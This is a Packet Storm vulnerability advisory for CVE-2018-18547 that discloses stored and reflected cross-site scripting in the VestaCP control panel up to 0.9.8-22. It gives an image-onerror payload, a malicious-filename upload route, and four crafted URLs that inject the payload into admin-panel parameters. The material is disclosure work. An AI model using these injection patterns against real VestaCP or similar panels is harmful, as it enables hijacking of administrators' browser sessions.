Lucene search
Numan OZDEMIRPACKETSTORM:149897HistoryOct 22, 2018 - 12:00 a.m.
VestaCP 0.9.8-22 Cross Site Scripting
2018-10-2200:00:00
Numan OZDEMIR
packetstormsecurity.com
35
EPSS
0.001
Percentile
50.1%
`[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] [email protected] - [email protected]
[~] Description:
Insert any XSS payload. I will use <img src onerror=alert(1337)>
https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file as named xss payload, using any form in your
website.
If VestaCP user see this file in the interface, his browser will run the
JavaScript.
So this vulnerability makes high risk.
https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS
// for secure days...
`
Related
cvelist
cvelist
CVE-2018-18547
2018-10-24 21:00:00
nvd
nvd
CVE-2018-18547
2018-10-24 21:29:01
zdt
zdt
VestaCP 0.9.8-22 Cross Site Scripting Vulnerability
2018-10-23 00:00:00
prion
prion
Design/Logic Flaw
2018-10-24 21:29:00
cve
cve
CVE-2018-18547
2018-10-24 21:29:01